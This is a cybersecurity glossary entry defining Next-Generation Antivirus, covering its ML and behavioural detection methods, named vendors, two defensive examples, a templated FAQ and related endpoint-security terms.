Next-Generation Antivirus (NGAV)
What is Next-Generation Antivirus (NGAV)?
Next-Generation Antivirus (NGAV)Endpoint protection that augments signature scanning with machine-learning models, behavioral analytics, and exploit prevention to stop unknown and fileless threats.
Next-Generation Antivirus (NGAV) emerged in the mid-2010s in response to the limits of signature-only AV. Vendors such as CrowdStrike Falcon, SentinelOne Singularity, Microsoft Defender for Endpoint, VMware Carbon Black, and Cybereason combine cloud-trained ML classifiers, behavioral monitors that watch process and API telemetry, exploit-mitigation modules, and Indicator-of-Attack (IOA) detection. NGAV blocks fileless techniques like LOLBins and reflective DLL loading that bypass classical signatures, and is the prevention layer typically packaged with an EDR or XDR sensor. NIST SP 800-83 and the MITRE Engenuity ATT&CK Evaluations describe and benchmark this category. Effective NGAV reduces dwell time but requires tuning to control false positives in developer-heavy environments.
● Examples
- 01
CrowdStrike Falcon Prevent blocking a previously unseen ransomware binary based on behavioral patterns instead of a signature.
- 02
Microsoft Defender ASR rule preventing Office macros from spawning child processes.
● Frequently asked questions
What is Next-Generation Antivirus (NGAV)?
Endpoint protection that augments signature scanning with machine-learning models, behavioral analytics, and exploit prevention to stop unknown and fileless threats. It belongs to the Defense & Operations category of cybersecurity.
What does Next-Generation Antivirus (NGAV) mean?
Endpoint protection that augments signature scanning with machine-learning models, behavioral analytics, and exploit prevention to stop unknown and fileless threats.
How does Next-Generation Antivirus (NGAV) work?
Next-Generation Antivirus (NGAV) emerged in the mid-2010s in response to the limits of signature-only AV. Vendors such as CrowdStrike Falcon, SentinelOne Singularity, Microsoft Defender for Endpoint, VMware Carbon Black, and Cybereason combine cloud-trained ML classifiers, behavioral monitors that watch process and API telemetry, exploit-mitigation modules, and Indicator-of-Attack (IOA) detection. NGAV blocks fileless techniques like LOLBins and reflective DLL loading that bypass classical signatures, and is the prevention layer typically packaged with an EDR or XDR sensor. NIST SP 800-83 and the MITRE Engenuity ATT&CK Evaluations describe and benchmark this category. Effective NGAV reduces dwell time but requires tuning to control false positives in developer-heavy environments.
How do you defend against Next-Generation Antivirus (NGAV)?
Defences for Next-Generation Antivirus (NGAV) typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Next-Generation Antivirus (NGAV)?
Common alternative names include: NGAV, Next-gen AV.
● Related terms
- defense-ops№ 050
Antivirus (AV)
Endpoint software that detects and removes malicious files using signature databases, file scanning, and basic heuristics — the historical foundation of endpoint security.
- defense-ops№ 371
EDR (Endpoint Detection and Response)
An endpoint security technology that continuously records process, file, registry and network activity to detect, investigate and respond to threats on hosts.
- defense-ops№ 1254
XDR (Extended Detection and Response)
A security platform that unifies telemetry from endpoint, network, identity, email and cloud sensors to deliver correlated detections and integrated response actions.
- defense-ops№ 091
Behavioral Detection
A detection approach that identifies malicious activity from the runtime behavior of processes, users, and network flows rather than from static file signatures.
- malware№ 417
Fileless Malware
Malware that runs primarily in memory and leverages trusted system tools, avoiding the use of traditional executable files on disk.
- network-security№ 1043
Signature-Based Detection
A detection method that compares observed traffic, files, or behaviour against a database of known-bad patterns (signatures) to flag malicious activity.